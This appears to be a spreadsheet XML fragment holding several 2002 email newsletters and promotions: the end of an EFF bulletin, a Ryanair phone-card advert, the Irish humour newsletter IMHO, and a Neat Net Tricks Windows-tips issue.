purchase can be donated back to EFF. From the main ShopsThatGive page,
simply select EFF as your designated cause, select a merchant or
category, and you're all set. It won't cost you anything extra and it
would help us out a lot. Please keep this giving opportunity in mind,
especially throughout the upcoming holiday season.Links:
ShopsThatGive:
http://www.shopsthatgive.com/Complete List of Participating Merchants:
http://www.shopsthatgive.com/category.aspxBuy EFF-related books through Amazon or Barnes&amp;Noble:
http://www.eff.org/promo/books.html-=end=-----------------------------------------------------------* Deep Links
Deep Links features noteworthy news items, victories, and threats from
around the Internet.~ Security Technologies Could Backfire Against Consumers
Robert Lemos at news.com with a balanced piece on trusted computing.
http://news.com.com/2009-1001-964628.html?tag=fd_lede1_hed~ Barbie's Kinky Rival Wins First Court Battle
Mattel loses first round in intellectual property battle over S&amp;M doll
with Barbie head.
http://www.thescotsman.co.uk/international.cfm?id=1242812002~ Unspooled
In the digital age, the quaint cassette is sent reeling into history's
dustbin.
http://www.washingtonpost.com/wp-dyn/articles/A32476-2002Oct28.html~ The Meaning and Importance of the TEACH Act
The American Library Association on the latest amendment to US
copyright law.
http://www.ala.org/washoff/teach.html-=end=-----------------------------------------------------------*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please visit http://action.eff.org/subscribe/.
&gt;&gt;From there, you can update all your information. If you have already
subscribed to the EFF Action Center, please visit
http://action.eff.org/action/login.asp.To unsubscribe from the EFFector mailing list, send an email to
alerts@action.eff.org with the word "Remove" in the subject.(Please ask ren@eff.org to manually remove you from the list if this
does not work for you for some reason.)Back issues are available at:
  http://www.eff.org/effector ++++++++++++++++++++++++
You received this message because legit-lists-eff@jmason.org is a member of
the mailing list originating from alerts@action.eff.org. To unsubscribe 
from all mailing lists originating from alerts@action.eff.org, send an 
email from legit-lists-eff@jmason.org to alerts@action.eff.org with 'Remove' as the
only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
We have extended our Free seat sale until Thursday 21st November
For details see http://www.ryanair.com***************************************************************************To celebrate the extension of our free seat sale our call card provider has
Slashed rates and is now offering additional call credit for free.Visit  https://www.bumblebeecommunications.com/lowcostcalls/Buy a Â£27 phone card for only Â£19.99 - 
a FREE phonecard with every purchase while stocks last.We have slashed our call rates again - we are committed to giving you
cheaper rates all the time!
Calls from	France	    Germany       U.KAustrailia	   	2c	   10c	            2p
Austria	   	2c	     7c	            4p
Canada	   	2c	     8c                  3p
Germany	2c	     8c                  3p
France	   	2c	     8c                  3p
Greece	   	6c	   11c	            9p
Hong Kong	4c	     8c                  3p
Ireland	   	2c                8c                  2p
Italy	         	2c	     7c                  3p
Japan	         	5c	   12c                  5p
Netherlands	2c	     8c                  3p
Norway	   	2c	   10c	            4p
Spain	         	2c	     8c                  3p
Sweden	   	2c	     8c                  2p
UK	         	2c	     8c	            2p
U.S.A	         	2c	     8c                  2pUse our virtual  phone cards to make cheap international phone calls at home
and abroad. Buy online now and collect your phone card immediately -   Sale
now on!Click on Ryanair.com's low cost phone card partner
https://www.bumblebeecommunications.com/lowcostcalls/NEW RYANAIR LOW COST MOBILE PHONE SERVICE
Pre-register for our all new mobile phone service launching very soon, We
will be offering a new no frills low cost mobile phone service
https://www.bumblebeecommunications.com/lowcostcalls/registration.html=====================================================================E-MAIL DISCLAIMERThis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
</t>
  </si>
  <si>
    <t xml:space="preserve">                  ___           ___           ___
                 /\  \         /\  \         /\  \
    ___         |::\  \        \:\  \       /::\  \
   /\__\        |:|:\  \        \:\  \     /:/\:\  \
  /:/__/      __|:|\:\  \   ___ /::\  \   /:/  \:\  \
 /::\  \     /::::|_\:\__\ /\  /:/\:\__\ /:/__/ \:\__\
 \/\:\  \__  \:\~~\  \/__/ \:\/:/  \/__/ \:\  \ /:/  /
  ~~\:\/\__\  \:\  \        \::/__/       \:\  /:/  /
     \::/  /   \:\  \        \:\  \        \:\/:/  /
     /:/  /     \:\__\        \:\__\        \::/  /
     \/__/       \/__/         \/__/         \/__/           one.ten
                                                            27.11.02                        Insignificant Matters Heavily Overemphasised
                                                          by Hugh mT
====================================================================It's time again for IMHO, brought to you as always by the letters I,
M, H and O, in partnership with the goofy electronic hubris of the
Irish Internet.  IMHO will be in orbit again sometime in early
December.   * * *   Back issues online at http://www.imho.8m.com   * * *Formatted for easy reading in Courier New, so you might like to
print it out in that font.  IMHO also contains hyperlinks to sites
of interest or relevance: read it while online, too, and check 'em
out.In case you're wondering, we Bowdlerise colourful language (e.g.
'bas7ard') so that IMHO can sneak past corporate obscenity filters,
like a Dublin solicitor's staff car zooming slyly down the taxi lane
with a cheap post-regulation taxi plate on top: http://xsls.com?81====================================================================Heartfelt thanks this ish to AnnieT, Sean, Ray and the indefatigable
Mr Brennan for leads and content.  And a big Brava! of
congratulations to Jacqueline on her outstanding occupational
odyssey, plus a Bravo! of felicitations to Badger for his famous
fourwheeled feat.====================================================================Please FORWARD this to anyone you think might be interested: if
that's how you received this, then please SUBSCRIBE by sending mail
to imho@eircom.net with the word 'subscribe' in the subject line.You didn't see the previous IMHOs?  They're either in your Junk Mail
folder with the rest of the s9am, or you weren't sent them.  Read
them online at http://www.imho.8m.com.  But make sure to SUBSCRIBE!====================================================================
AN INTERNET EIREANNACH............................Ping An Irish SongYet another Irish internet company, Octagon Technologies, closed for
good this week.  And after reading the phrase for what seemed like
the umpteen-thousandth time, we were idly wondering how many Irish
tech companies blamed their misfortunes "on the global downturn":
http://makeashorterlink.com/?S35A63392Oh, so it's about 450 then.  Thanks, Google.*The death occurred recently of that great Irish washtub musician
Lonnie Donegan.  RIP.  This seems like an apt time therefore to
reflect on his many accomplishments: his virtuoso playing of
utensil-based instruments, his worldwide commercial success, his
place in history as King of Skiffle, and how he wiped billions of
yen off the value of the Tokyo stock market:
http://groups.google.com/groups?selm=373A9C4F.61B@time.life
("panic and subsequent 10+% decline of Tokyo Stock Exchange when Reuters
advised 'Lonnie Donnegan' was dead")
and also at
http://xsls.com?80
("to Japanese ears it sounded like Ronald Reagan").*UCD's Literary and Historical Society this week awarded an honorary
fellowship to the tediously brilliant American multidisciplarian Dr
Noam Chomsky.  Now the idea of some trifling college society
awarding a mere honorary fellowship actually sounds rather like an
insult to us, considering that Niall Quinn and Marian Finucane were
given *degrees* by DIT the very next day, but then Chomsky
apparently inspired some of Radiohead's most caterwaulingly blunted
songs, so we suppose it serves him right.  Anyway, if you're an
admirer of the great man's hermeutic genius, linguistic philosophy
or contentious views on US foreign policy, perhaps you might also
appreciate his amazing interview of Tom Hanks:
http://www.sadiethepilot.com/aaweb/tapes.htm#tomnnoamVery special thanks to IMHO's London correspondent Ray Butler for
this one.*Key IMHO contributor Sean Lynch quite realistically predicts a post-
Budget dole queue for all of us, and wonders if we'll miss those
cash-and-job cow multinationals when they're gone?   Not if their
Irish presence was as permanent and impressive as "the world's
leading risk and insurance services firm", he concludes:
http://www.marsh.ie
(compare and contrast with, say, http://www.marsh.co.uk/)*Also: we've been remiss in the past in not featuring
EircomTribunal.com's stalwart and righteous campaigning against
Eircom's crippling rates and crippled infrastructure in this
country.  Well, we aim to redress that right now, by pointing out
(1) Their 'Banana Republic' international price comparison page at
http://www.eircomtribunal.com/dossier_banana_rep.html, which will
surely make you mad enough to
(2) Download and print out their marvellously bitter "No More
Favours For You, Mr Eircom Employee" flyer from
http://www.eircomtribunal.com/counterstrike_a2_nomore.html, designed
to be stuck under the windshields of the ubiquitous and bilious
blue/orange Eircom vans.
Now if only EircomTribunal.com could somehow could retrieve that
money we all lost on bloody Eircom shares...
                          * * * * * * * * *
IMHO'S PICK: JOB....................IMHO HO HO (AND A BOTTLE OF RUM)"FATHER CHRISTMAS on a bike - Student - Giving out FREEBIES - Four
weeks".  No, not us telegraphing our worst nightmare to our shrink,
but a job description for a position that apparently pays "enough".
Email tmckeagney@msn.com or hell, cycle into his perfume shop at 128
The Stephens Green Centre and show him what you can do.And hey, if you're a crazy maniac, that's great too.  It's about
time we had an Irish SANTACON - after all, no force on earth can
stop one hundred Santas, especially if they're drunk:
http://www.santarchy.com/
(from the San Francisco Police Report, "the naughty Santas ... had
reeked (sic) havoc in the emporium ... in an un-Christmas like
fashion.")*Heh.  Disproving the stereotype that all accountants are boring:
some Dublin 2 company is looking for a "Parti-time bookkeeper" at
http://xsls.com?83*Our attention-deficient gaze also fell briefly this week onto a box
ad in a Sunday paper which is seeking private investors for an
ADVENTURE SPORTS RETAILING business in Dublin.  Now this probably
just means selling snowboards or something equally tame, but in our
imagination we see IMHO readers hunting elephants, dogfighting in
biplanes over the Wicklow Hills and abseiling down moon craters.
Just in case we're right, any "smart, experienced partner/investor"
looking for an "equity stake/board position" should "express"
"interest" to neptune@atomic.ie.You know, it might look like we're giving these people free
advertising, but by putting their email addresses on the public web,
we're actually GUARANTEEING them spam...
                          * * * * * * * * *
IMHO'S PICK: EVENT...........................Allow Us To DemonstrateFriday is BUY NOTHING DAY.  For the sake of your own mental health
and the socio-economic future, we urge you to give it a try.  It's
not that hard to get through 24 hours without a purchase, and those
corporate balance sheets sure look funny with a big pre-Christmas
hole in them.The official home of BND is of course Adbusters
(http://adbusters.org/campaigns/bnd/) and they have a run-down of
Irish activities at http://xsls.com?84... rather a disappointing line-up
at this late stage, although the Zombie-Shopping in Galway sounds
like fun - shame they're moving the day to Saturday, hopefully it's
not for purpose-defeating reasons ("Friday?  Damn, I'm working the
late shift at McDonald's... how about Saturday?").  In addition and
elsewhere you can expect bring-and-trade markets, flypostering, free
stuff, public speaking and all the other happy faces of democratic
consumer agitation.  Punk's not dead!  Party for your right to
fight!  No Logo!  Hare Hare!  And so on.*We're now going to risk life and limb by mentioning an event which
is so diametrically opposed to the above that we might just bring
about the heat-death of the Internet by combining them in the one
newsletter.We speak of course of the benighted and spiritually-denuded sickness
of the TRILOGY FASHION SHOW in the RDS on December 4th, tickets
starting at "just E50" (but rising to E395 + VAT, natch).  The
advertising for this bleak celebration focuses entirely on "the most
beautiful women in the world" who will grace the Simmonscourt
Pavilion with their airbrushed emptiness: Tyra Banks, Sophie Dahl
and Anna Kournikova (not the virus) are the only names we recognise.
You have to pore pretty closely over the small print of the press
ads to divine that it's the "new Escada Collection" (the who now?)
they're modelling.  And in an utterly appropriate and inevitable
partnership, tickets are available from the cultural sewage
treatment system that is Ticketmaster.
http://www.cslassociates.ie/events/trilogy_fashion.htm
                          * * * * * * * * *
IMHO'S PICK: DOWNLOAD..................Transparent and UnaccountableGiven our internet focus and the subversive nature of our scurrilous
publishing agenda, there is only one possible download
recommendation this week.  It's the brilliant GHOSTZILLA browser, a
creation of architectural genius which brings office escapism to
heady new heights.Designed to facilitate inconspicuous worktime browsing, Ghostzilla
sits quietly and invisibly in the background until you summon it
with a special mouse movement.  It then adapts itself to your
currently-uppermost application, for example Micro$oft Word, leaving
Word's toolbars intact while showing web pages in a subtle grayed-
out wash in the main window.  Images appear in a subdued two-tone
unless you summon them, and the overall effect is to make it look
like you're working exactly as you should be.  A casual glance from
your Office Space boss as he paces past your cubicle shouldn't
detect anything that looks like browsing.  To think that someone
devoted their life to creating something so wonderfully juvenile!
It's a beautiful thing.  Go ghosting at
http://www.ghostzilla.com.
                          * * * * * * * * *
IMHO'S PICK: INTERNET^HWS................................ON YER BIKERoll up, roll up roll up!  Segue right this way!  Amazon is now
selling the celebrated SEGWAY (aka Ginger, aka IT) online, the hype
of the millennium finally made available to lowly consumers.  You're
only four months and five thousands bucks away from participating in
the future of transport, the most fundamental and significant
breakthrough in human evolution since the invention of the leg, the
"spirit that can change the world", etc. etc.Get out your chequebook and get your Segway at
http://makeashorterlink.com/?N49A51392.*The perfect expression of our post-modern mania for meta-media
(whoah! Easy, Chomsky!) is the utterly compelling 'Hoax Photo Test'
at http://www.museumofhoaxes.com/tests/hoaxphototest.html(If you've seen this already, that's prolly 'cos the mighty B3TA.com
featured it last Friday - credit where it's due)*"Imagine being able to run a Google-like search on your life," says
one of the prophets of doom behind MyLifeBits, an incredibly Dickian
personalised self-database being developed by - who else? -
Microsoft.  By cataloguing every single artifact of your life
history, storing everything in an online repository, you build a
searchable index of every conversation, document, movement, event
and action that you ever generate or perform.  It's a continuous
real-time alibi recorder.  It's a voluntary submission of every
second of existence to information overload.  It's a system that can
show you all the photos you were ever in, tell you exactly how many
phonecalls you've ever made, or retrieve an mpeg of you going to the
toilet in March, 1986:
http://www.newscientist.com/news/news.jsp?id=ns99993084Also: we knew that modern innovation was roaring ahead at a
blistering pace, but can MyLifeBits really allow "time-shifting"?
http://research.microsoft.com/barc/MediaPresence/MyLifeBits.aspFor a fictional (OR IS IT???) look at where this sinister technology
might just lead, check out this wonderful piece of short science
fiction (OR IS IT???):
http://www.ftrain.com/robot_exclusion_protocol.html
("I'm a Googlebot!  I will not kill you.")*The newest in the intriguing development of really sick-minded God-
perspective Flash games (e.g. suicide bombers at
http://www.albinoblacksheep.com/flash/kaboom.html, giant human-burning
magnifying glass at http://xsls.com?82) has arrived... boasting a title as
bereft of imagination as the gameplay is of taste, it's 'Pedestrian
Killer':
http://www.flaboratorium.org/data/flabor/4/4.htmBut if you prefer God-games which let you manipulate the very atoms
of creation, check out the awe-inspiring microscopic version of
Tetris using computer-controlled microspheres these loons have
created:
http://www.nat.vu.nl/~joost/complex/index.html.*We Irish are sometimes so uncultured, compared to our continental
cousins - even in things you'd expect us to be good at, like
vandalism.  Here we get inarticulate clowns with cans of red paint
daubing "666" on the gates of Cardinal Connell's palatial Drumcondra
residence... whereas in Paris, to pick an example out of the blue,
egghead situationists sneakily attach absurdist plaques (e.g. "On
April 17, 1967, nothing happened here") onto public buildings:
http://news.bbc.co.uk/2/hi/europe/2478161.stm*Microsoft have co-opted the AmIHotOrNot concept, as is their wont, mixed
it up with a bit of Miss World, and come up with the 'Microsoft Office v.
X Integrated Experience', or Ms. M.o.X.i.e. competition:
http://www.microsoft.com/mac/officex/contests/votemain.asp
Was it for this Emily Wilding Davison died beneath King George V's horse?
Was it for this that all those bras were burned?  It's like Girl Power
never happened.*When good TiVos go bad: you tape one episode of Ellen, they assume
you're gay:
http://online.wsj.com/article_email/0,,SB1038261936872356908,00.html
                          * * * * * * * * *
LEGACY MEDIA.................There Was Nothing In The Air That NightIRISH TV: If you rush straight home from work after reading this on
Thursday, you might catch the second semi-final of corny but
challenging elimination quiz IT'S NOT THE ANSWER (RTE1, 17:30).
Come on the beardy guy!  The final's on at the same time tomorrow.
Calm down from all that excitement with the laughable one-hour FAIR
CITY murder trial special (RTE1, 20:00) - it's quite brilliant how
the risible scripts really bring out the absolute worst in truly
terrible actors.  Settle down with a few G&amp;Ts to watch PRIME TIME on
the same channel at 21:30, where they're discussing Ireland's
alcoholic epidemic and its attendant social problems, or waste them
on either the bottom-scraping POLICE ACADEMY 3 (N2, 21:30) or the
geriatric 1978 blockbuster COMA (TG4, 22:05).Friday night, and after a hard day of buying nothing you can flop in
front of creepy Hitler doco SIX MOST EVIL MEN (N2, 21:00).  Near as
we can tell, the other evil men are Macauley Culkin in UNCLE BUCK
(TV3, 20:00), gossip columnist WINCHELL in a solid eponymous biopic
(N2, 21:30), the big boss bad guy - is it Kang? Kane? Cowen? - in
MORTAL KOMBAT (TG4, 21:25), Mel Gibson in predictable 80s drug
thriller TEQUILA SUNRISE (RTE1, 23:50), and Quentin Tarantino
jumping on his own bandwagon in DESTINY TURNS ON THE RADIO (TV3,
0:50).  Hang on, Dave Fanning might be one of the evil men too: he's
presenting THE LAST BROADCAST on Network 2 at 23:35.
                          * * * * * * * * *
COLOPHON....................................................APOLOGIAWe'd like to focus mainly on the IRISH Internet, but, uh, we were
sick that day.  Please help us out by mailing in your topical Irish
net news, your high-profile .ie failures, your worthy Gaelic
successes, your hilarious local web misadventures, anything that
seems messed-up, inappropriate or insane... or just mail us your
feedback.  (That address is imho@eircom.net)But whatever you do, PLEASE PLEASE PLEASE send this on to as many
people as you can.  If you don't, hostile scripts embedded in this
character string will disable your 'Forward' button forever:
~:|``Â¦?====================================================================SUBSCRIBE by sending mail to imho@eircom.net with the word
'subscribe' in the subject line.
UNSUBSCRIBE by sending mail to imho@eircom.net with the word
'unsubscribe' in the subject line.====================================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">IN THIS ISSUE:01. Readers write
02. Extension search
03. Dumb messages revisited
04. XP Tweak
05. Hardware Diagnostic Tool
06. Training Windows
07. Hold that button
08. Hagai's freeware
09. Online helpAnd Coming Next Week!&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;
Make Internet Explorer Faster, More Capable, and Secure! 
NNT's reviewers called Secure IE great, easy-to-use,awesome,
impressive, a total "thumbs up"!  Read what they're raving 
about and get yours at http://www.secureie.com/p/nnt1/
&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;01. READERS WRITE.  A Wisconsin subscriber wrote to express his displeasure 
with the links contained in Neat Net Tricks.  It seems he is bothered by 
the frequent pop-up ads and he felt that only those sites without the ads 
should be featured in NNT, particularly in the Premium issue. We replied 
that pop-ups can be annoying but, while not defending them, we must realize 
that they are a form of marketing in which the site owner hopes to recover 
his costs and possibly make a profit.  We suggested using a pop-up stopper 
(there are lots of them on the Web) and ALT F4 will quickly close active 
pop-up windows.  Finally, we pointed out that no publication can guarantee 
only sites without pop-up ads.  As we've often said in the past, the 
Internet isn't free and never was.  Someone has to pay the freight and if 
those ads are unprofitable, they will cease to exist.02. EXTENSION SEARCH.  Next time a file extension has you puzzled, try the 
database at http://extsearch.com/ information.03. DUMB MESSAGES REVISITED.  Not long ago we mentioned a few dumb messages 
we see from our computer and invited others to share their favorite 
"dumbness."  A reader frequently gets a banner ad that asks "Do you click 
on banner ads."  She asks, if you don't,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http://www.microsoft.com/NTWorkstation/downloads/PowerToys/Networking/NTTweakUI.asp 
for having a really dumb comment.  After downloading a Windows update, it 
says:  "How to Get Started -- You don't need to do anything after 
downloading" and he asks, "what's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we'll do it again in a future issue!04. XP TWEAK.  A recent article reminded readers of the neat things that 
can be done with TweakUI, but the XP operating system was not supported by 
the Tweak at that link.  Never fear, XP folks, you'll find a whole array of 
power tools included Tweak - all for XP - at 
http://www.microsoft.com/windowsxp/pro/downloads/powertoys.asp .. . . . .1, 400+ Neat Net Tricks tips updated 4 times yearly for the word processing 
format of your choice, also in ebook format, plus extra features, 
downloadable and just $20 a year, a bargain (and a nice stocking stuffer 
for Santa) at http://www.NeatNetTricks.com/store.. . . . .05. HARDWARE DIAGNOSTICS TOOL.  Windows98 users have a neat tool at their 
fingertips without downloading.  Click on Start and Run and enter "hwinfo 
/ui" without quotes.  The information displayed is color-coded.  Error 
messages are in red, warnings are in blue.  Green denotes registry entries, 
Configuration Manager information is in brown and file attributes are shown 
in magenta.06. TRAINING WINDOWS.  One pet peeve is Windows' determination to identify 
a shortcut icon as "Shortcut to (whatever)"  This is pure redundancy, since 
shortcuts are identified by an arrow.  And, with the added verbage of 
"Short cut to" you can't jump from one icon to another by pressing the 
first letter (since they would all start with an "s".  If you keep removing 
"Shortcut to," Windows will eventually understand your intent and future 
shortcuts won't include "Shortcut to".07. HOLD THAT BUTTON.  The site at http://www.holdthebutton.com/ invites 
you to hold the mouse key down.  Now, before you hastily jump to 
conclusions that there's nothing more to this site, when you release the 
button, you are told how you rank in stamina with other button 
holders.  And when I took my turn at the controls, I found that the longest 
record was a little over six hours, proving once again that some folks need 
to get a life.08. HAGAI'S FREEWARE.  A baker's dozen (13) freeware programs are at 
http://www.hagai.com/download.asp?ProgType=Freeware . They include a bug 
checker, screen saver loader, clock, shutdown utility, CD autorun, boot 
editor, menu, counter,icon viewer and editor, and more.09. ONLINE HELP.  Of limited scope, but considering that you can never get 
enough help with your computer, try http://www.computerhope.com/oh.htm .. . . . .Apologies to those readers who were inconvenienced with multiple issues of 
NNT Issue #137.  As luck would have it, Lyris (our mail server) had 
hardware failure causing some of the repeated distribution. We'd like to 
tell you that there will never be another problem in future mailings, and 
if you'll buy that, as the song goes, we have some oceanfront property in 
Arizona for sale.. . . . .IN NEXT WEEK'S NEAT NET TRICKS PREMIUM:  Google is generally accepted as 
the most popular search engine, but we show you another free download that 
enhances Google, along with a way to "Google" without a browser.  Learn a 
neat trick with text manipulation, a Winamp plugin that you need if you 
have a taste for MP3 music, and a slick trick with your cursor.  Our 
Software Pick-Of-The-Issue is a great image manipulator.  And our feature 
is an in-depth tutorial on how to handle Microsoft Words' sometimes weird 
formatting and styles.  All that awaits you if you're a Premium subscriber 
and it costs just $10 a year for 24 fact-packed issues.  Subscribe at the 
NNT Store, http://www.NeatNetTricks.com/store and get on the cutting edge.. . . . . .NNT makes no endorsement or warranty, expressed or implied, with regard to 
featured products or services. Results may vary based on operating systems 
and other variables beyond our control.For info on how to subscribe, unsubscribe, or change your address, send a 
blank email to info-neatnettricks@silver.lyris.net .Comments or questions about your computer and the Internet? Visit the NNT 
Bulletin Board at http://escribe.com/computing/neatnettricks/bb/ .NNT is hosted by Lyris.com, the best in email list management.Copyright 2002 by Jack Teems. All rights reserved. Neat Net Tricks is 
registered with the U.S. Library of Congress ISSN: 1533-4619. 
---
You are currently subscribed to neatnettricks as: legit-list-neatnettricks@spamassassin.taint.org
To unsubscribe send a blank email to leave-neatnettricks-2424157K@silver.lyris.net
</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
